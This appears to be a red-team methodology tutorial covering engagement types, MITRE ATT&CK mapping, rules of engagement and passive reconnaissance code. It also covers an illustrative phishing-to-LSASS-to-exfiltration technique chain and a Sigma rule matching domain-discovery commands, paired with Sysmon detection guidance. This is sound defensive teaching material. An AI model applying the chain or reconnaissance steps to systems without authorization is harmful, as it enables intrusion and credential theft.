The defining trait: red team engagements deliberately do not seek full coverage. They genuinely test whether the organization can block or detect an attack chain, which is why they are the longest-running of all assessment types — stealth and patience are part of the deliverable.
2. The Adversarial Mindset
A red operator thinks objective-first, not checklist-first. Compliance testing asks “is this control present?” Adversarial thinking asks “what is the cheapest path to the crown jewels that the SOC will not see?”
Three mental anchors define the mindset:
- Objective-first — every action serves a defined goal (data, access, impact). Noise that does not advance the objective is risk.
- Stealth-conscious — assume the environment is instrumented. Prefer living-off-the-land over noisy tooling; pace operations to blend with baseline activity.
- Iterative — reconnaissance, hypothesis, action, observation, adapt. A blocked path is intelligence, not a dead end.
The premise underpinning modern engagements is assume breach: perimeter compromise is treated as inevitable, so the real measurement is how fast the defender detects and contains post-compromise activity.
3. Industry Methodologies
Red teaming inherits structure from established testing methodologies, then layers ATT&CK on top for adversary realism.
| Methodology | Focus |
|---|---|
| PTES | Seven-phase end-to-end execution model |
| OSSTMM | Operational security measurement and metrics |
| NIST SP 800-115 | Technical guide to information security testing |
PTES (Penetration Testing Execution Standard) provides the canonical seven phases:
- Pre-engagement Interactions — scope, objectives, rules of engagement, timelines, legal/compliance
- Intelligence Gathering — reconnaissance, OSINT, passive and active scanning
- Threat Modeling
- Vulnerability Analysis
- Exploitation
- Post-Exploitation
- Reporting
These methodologies describe how to test; ATT&CK describes how adversaries behave. A red team uses PTES/NIST for process discipline and ATT&CK as the operating language to choose and document technique-level actions.
4. Engagement Types Deep Dive
Engagement format is chosen by organizational maturity and the question being answered.
| Engagement Type | Definition |
|---|---|
| Full Scope (Black Box) | Simulates a real attacker against the entire environment; no insider knowledge granted |
| Assumed Breach | Starts inside the network to measure post-compromise detection and containment speed |
| Objective-Based | Targets a specific outcome or asset without a full organizational assessment |
| Threat-Informed | Mirrors the TTPs of adversaries most likely to target the industry (adversary emulation) |
| Purple Team | Collaborative, shared-visibility execution with a debrief after each TTP |
In an Assumed Breach, the client grants the foothold — executing a payload, issuing a single-use VPN or VDI session, or staging a “stolen laptop” scenario — so the team skips Initial Access and focuses on post-exploitation.
Knowledge levels cut across all formats:
| Level | Information Provided |
|---|---|
| Black box | None; no insider/privileged information |
| Grey box | Limited (e.g., network diagrams, low-priv credentials, no source) |
| White box | Full system and security-control information (typical for Assumed Breach) |
Low-maturity orgs benefit most from purple or objective-based work; mature orgs with a functioning SOC gain the most from full-scope, unannounced engagements.

5. MITRE ATT&CK as the Red Team Operating Language
MITRE ATT&CK is a globally recognized knowledge base of adversary tactics and techniques built from real-world observations. It gives red and blue a common language: tactics are the adversary’s objectives, techniques are how they achieve them, and procedures are the specific implementations.
The Enterprise Matrix spans Windows, macOS, Linux, and cloud, organized into 14 tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, and Impact.
ATT&CK Navigator lets teams annotate technique coverage as a JSON layer — color and score per technique — to track what was attempted, alerted, or blocked.
```json
{
  "name": "Engagement-2024 Coverage",
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 100, "color": "#e60d0d", "comment": "Initial access - undetected" },
    { "techniqueID": "T1059.001", "score": 50, "color": "#fce93a", "comment": "Executed - alerted, not blocked" },
    { "techniqueID": "T1003.001", "score": 0, "color": "#31a354", "comment": "Blocked by Credential Guard" }
  ]
}
```
Although ATT&CK was created to support adversary emulation, it is equally valuable to blue teams for detection, hunting, and response — which is precisely why red teams document in ATT&CK terms.
6. The Engagement Lifecycle
The Red Team Guide condenses execution into three macro-phases: gain access, establish persistence, and perform operational impact. Expanded against ATT&CK tactics, the flow is:
```text
Pre-Engagement ──► Recon ──► Initial Access ──► Execution ──► Persistence
  (RoE/SoW)       (TA0043)      (TA0001)        (TA0002)       (TA0003)
                                                                   │
                                                                   ▼
Debrief/Report ◄── Exfiltration ◄── Collection ◄── Lateral Move ◄── Priv Esc
 (ATT&CK map)       (TA0010)         (TA0009)        (TA0008)       (TA0004)
```
Each phase produces a deliverable: pre-engagement yields the signed scope and RoE; recon yields a target profile; exploitation yields proof-of-access artifacts; reporting yields the ATT&CK-mapped findings and detection-gap backlog.

7. Rules of Engagement and Pre-Engagement
No packet is sent without written authorization. The Rules of Engagement (RoE) and Statement of Work define the legal and operational guardrails. A minimal RoE skeleton:
```text
RULES OF ENGAGEMENT — <Client> / <Vendor>
1. Scope (in-bounds): IP ranges, domains, cloud tenants, physical sites
2. Out-of-Scope: Systems/data explicitly forbidden (e.g., prod payroll)
3. Authorized Actions: Exploitation? Lateral movement? Data exfil simulation?
4. Notification State: Announced | Unannounced (does SOC know?)
5. Deconfliction: 24/7 emergency contact, get-out-of-jail signal phrase
6. Data Handling: Treatment of sensitive data encountered mid-op
7. Engagement Window: Start/end dates, permitted hours
8. Legal Authorization: Signatures, SoW reference, indemnification
```
The deconfliction channel and notification state are non-negotiable: they prevent a real incident response from spinning up against an authorized test and define whether the blue team is being tested blind.
8. Reconnaissance — Passive Versus Active
ATT&CK separates passive collection from active probing. T1596 (Search Open Technical Databases) sends no traffic to the target — it queries third-party indexes. T1595 (Active Scanning) probes victim infrastructure directly and is noisier and higher-risk.
```python
import shodan, whois  # read-only OSINT libraries

api = shodan.Shodan("<authorized-engagement-key>")
# Passive WHOIS lookup — registrar/registration metadata only
record = whois.whois("scoped-target.example")
print(record.registrar, record.creation_date)
# Query Shodan's EXISTING index — no packets sent to the target host
host = api.host("203.0.113.10")
for service in host["data"]:
    print(service["port"], service["product"])
```
Passive recon is favored early because it leaves no trace in the target’s telemetry. Active scanning is sequenced only when scope and stealth budget permit, since it surfaces in firewall and IDS logs.
9. Adversary Emulation and the Tooling Ecosystem
Threat-informed engagements use Adversary Emulation Plans — MITRE prototype documents built from public threat reports — so operators behave like a specific group (e.g., APT29, FIN7), sticking to that actor’s known TTPs with latitude in implementation.
| Tool | Role |
|---|---|
| MITRE CALDERA | Automated post-compromise emulation driven by an ATT&CK-based adversary model |
| Atomic Red Team | Library of small, focused tests mapping one-to-one to ATT&CK techniques |
| Cobalt Strike / Sliver / Havoc | C2 frameworks that simulate adversary command-and-control channels (conceptual) |
| ATT&CK Navigator | Visualizes technique coverage and compares threat profiles |
Atomic Red Team enables unit-style TTP testing. The pattern below runs a benign discovery technique on a lab VM to validate telemetry — it produces no harm:
```powershell
# Lab VM only - benign discovery, no exploitation
Import-Module Invoke-AtomicRedTeam
# T1016 - System Network Configuration Discovery
Invoke-AtomicTest T1016 -ShowDetails
Invoke-AtomicTest T1016 -TestNumbers 1   # runs: ipconfig /all, route print
```
10. Red, Blue, and Purple Team Dynamics
The mode of collaboration defines the exercise. In an unannounced red team, the blue team is blind — this measures real-world detection. In a purple team, red and blue share visibility and debrief after each TTP, maximizing tradecraft coverage and detection tuning.
| Mode | Information Sharing | Best For |
|---|---|---|
| Red (unannounced) | None until debrief | Measuring true SOC detection/response |
| Red (announced) | Blue knows test is occurring | Controlled validation, reduced IR risk |
| Purple | Full, real-time | Rapid detection engineering, low-maturity uplift |
Purple is the fastest route to closing gaps; unannounced red is the truest measure of readiness. Mature programs alternate between them.

11. Common Attacker Techniques
A red team chains techniques across tactics. A canonical illustrative chain for teaching — not a how-to — runs:
T1566.001 Spearphishing Attachment → T1059.001 PowerShell → T1003.001 LSASS Memory → T1021.002 SMB/Admin Shares → T1048.003 Exfiltration Over Non-C2 Protocol.
| Technique | Description |
|---|---|
| Phishing | Spearphishing attachment as initial access vector |
| Valid Accounts | Credential abuse; the assumed-breach entry point |
| PowerShell Execution | Most-observed Execution interpreter in intrusions |
| Process Injection | Stealth execution and defense evasion primitive |
| Credential Dumping | LSASS memory access for lateral movement material |
| Lateral Movement | SMB/admin shares to reach high-value hosts |
MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Spearphishing Attachment | T1566.001 | Mail gateway, attachment sandboxing |
| Valid Accounts | T1078 | Anomalous logon, Security EID 4624 |
| PowerShell | T1059.001 | Script Block Logging EID 4104, AMSI |
| Process Injection | T1055 | Sysmon EID 7/EID 8 |
| LSASS Memory | T1003.001 | Sysmon EID 10 GrantedAccess |
| SMB/Admin Shares | T1021.002 | EID 5145, logon type 3 |
| Web Protocol C2 | T1071.001 | Sysmon EID 3, proxy logs |
| Exfil Over C2 | T1041 | Sysmon EID 3, egress volume |

12. Defensive Strategies and Detection
A red team’s value is realized only when the blue team instruments the environment to measure it. Deploy Sysmon with a tuned config and enable the relevant audit policies.
| Event ID | What It Captures |
|---|---|
| Event ID 1 | Process Create — execution lineage |
| Event ID 3 | Network Connection — beaconing / C2 callouts |
| Event ID 7 | Image Loaded — DLL load (injection detection) |
| Event ID 11 | File Create — drops to disk |
| Event ID 22 | DNS Query — DNS-based C2 / tunneling |
Enable Audit Process Creation (feeds Sysmon EID 1 and Security EID 4688 with command-line logging), Audit Logon Events for credential-based lateral movement, Audit Object Access for exfiltration/persistence, and Audit Privilege Use for escalation. Key ETW providers include Microsoft-Windows-Kernel-Process, Microsoft-Windows-DNS-Client, AMSI, and Microsoft-Windows-PowerShell.
A foundational Sigma sketch for surfacing reconnaissance commands in process-creation telemetry:
```yaml
title: Red Team Awareness - Host & Domain Discovery Commands
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    CommandLine|contains:
      - 'ipconfig /all'
      - 'route print'
      - 'net group "Domain Admins"'
  condition: selection
level: low
```
After the engagement, generate a coverage report and feed it into ATT&CK Navigator to drive a prioritized detection backlog:
```python
TACTICS = {
    "T1596": "Reconnaissance", "T1566.001": "Initial Access",
    "T1059.001": "Execution", "T1003.001": "Credential Access",
    "T1021.002": "Lateral Movement", "T1041": "Exfiltration",
}
detected = {"T1059.001", "T1003.001"}  # techniques the SOC alerted on
for tid, tactic in TACTICS.items():
    status = "HIT" if tid in detected else "GAP"
    print(f"[{status}] {tactic:20} {tid}")
```
Adopt an assume-breach posture: segment networks so lateral movement is detectable and costly, enable PowerShell Script Block Logging via GPO, and turn on command-line auditing. Map successful detections and missed techniques back to the ATT&CK matrix to build the remediation backlog.
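The HIT/GAP printout above and the hand-written Navigator layer in section 5 are two views of the same data, so the natural next step is to generate the layer from engagement outcomes rather than edit JSON by hand. The generator below is an added example, not code from the tutorial or from the ATT&CK Navigator project; it emits the same fields as the layer shown in section 5 (name, domain, techniques with techniqueID/score/color/comment) using that layer's score-and-color scheme (100 red undetected, 50 yellow alerted, 0 green blocked), validates technique IDs, and derives the detection backlog from the result. The engagement outcomes are constructed.

```python
"""Build an ATT&CK Navigator layer from per-technique engagement outcomes.

Added example, not from the original tutorial. ENGAGEMENT_RESULTS is a
constructed outcome table; the field set and color scheme follow the
layer shown earlier on this page.
"""
import json
import re

TECHNIQUE_ID = re.compile(r"^T\d{4}(?:\.\d{3})?$")  # T1234 or T1234.001

# Score and color per outcome, matching the page's layer convention.
OUTCOME_STYLE = {
    "undetected": (100, "#e60d0d"),
    "alerted": (50, "#fce93a"),
    "blocked": (0, "#31a354"),
}

# Constructed outcomes for the chain discussed in section 11.
ENGAGEMENT_RESULTS = {
    "T1596": ("undetected", "Passive OSINT - no target telemetry possible"),
    "T1566.001": ("undetected", "Attachment delivered, no mail-gateway alert"),
    "T1059.001": ("alerted", "Script Block Logging fired, not blocked"),
    "T1003.001": ("blocked", "Credential Guard prevented LSASS read"),
    "T1021.002": ("alerted", "EID 5145 admin-share access alerted"),
    "T1041": ("undetected", "Egress volume stayed below DLP threshold"),
}


def build_layer(name: str, results: dict) -> dict:
    """Return a Navigator-style layer dict; rejects malformed IDs and unknown outcomes."""
    techniques = []
    for tid, (outcome, comment) in sorted(results.items()):
        if not TECHNIQUE_ID.match(tid):
            raise ValueError(f"malformed technique ID: {tid}")
        if outcome not in OUTCOME_STYLE:
            raise ValueError(f"unknown outcome {outcome!r} for {tid}")
        score, color = OUTCOME_STYLE[outcome]
        techniques.append({"techniqueID": tid, "score": score,
                           "color": color, "comment": comment})
    return {"name": name, "domain": "enterprise-attack", "techniques": techniques}


def detection_backlog(layer: dict) -> list[str]:
    """Techniques that ran undetected: the prioritized gap list for the blue team."""
    return [t["techniqueID"] for t in layer["techniques"] if t["score"] == 100]


def layer_json(layer: dict) -> str:
    """Serialized form ready to load into Navigator."""
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    layer = build_layer("Engagement-2024 Coverage", ENGAGEMENT_RESULTS)
    print(layer_json(layer))
    print("backlog:", detection_backlog(layer))
```

Keeping outcomes in a table and generating the layer means the debrief artifact and the backlog never drift apart, and the ID check catches the typo'd sub-technique that Navigator would otherwise silently drop.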
13. Tools for Red Team Operations
| Tool | Description | Link |
|---|---|---|
| MITRE CALDERA | Automated ATT&CK-based adversary emulation | caldera.mitre.org |
| Atomic Red Team | Unit tests per ATT&CK technique | atomicredteam.io |
| ATT&CK Navigator | Coverage visualization and planning | attack.mitre.org |
| Sysmon | Deep process/network/file telemetry | sysinternals.com |
| Sigma | Vendor-agnostic detection rule format | sigmahq.io |
| Volatility | Memory forensics for post-engagement analysis | volatilityfoundation.org |
Summary
- Red teaming is objective-driven adversary simulation that measures detection and response — not exhaustive vulnerability enumeration.
- The adversarial mindset is objective-first, stealth-conscious, and iterative, anchored on an assume-breach premise.
- Engagement type (full scope, assumed breach, objective-based, threat-informed, purple) is chosen by organizational maturity and the question being asked.
- MITRE ATT&CK’s 14 tactics provide the common language that lets red document operations and blue translate findings into detections.
- Every offensive TTP is paired with Sysmon/audit telemetry and an ATT&CK-mapped debrief that produces a prioritized detection-gap backlog.
Related Tutorials
- Building a Red Team Lab: Infrastructure, VMs, and C2 Setup
- Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
- OPSEC Principles for Red Teamers: Staying Undetected
- Phishing Campaign Design: Pretexting, Lures, and Target Profiling
- Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
References
- Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
- Adversary Emulation Plans | MITRE ATT&CK®
- Azure Security Control: Penetration Tests and Red Team Exercises | Microsoft Learn
- Microsoft AI Red Team: Building the Future of Safer AI | Microsoft Security Blog
- Getting Started with ATT&CK: Adversary Emulation and Red Teaming | MITRE ATT&CK® (Medium)
- Planning Red Teaming for Large Language Models and Their Applications | Microsoft Learn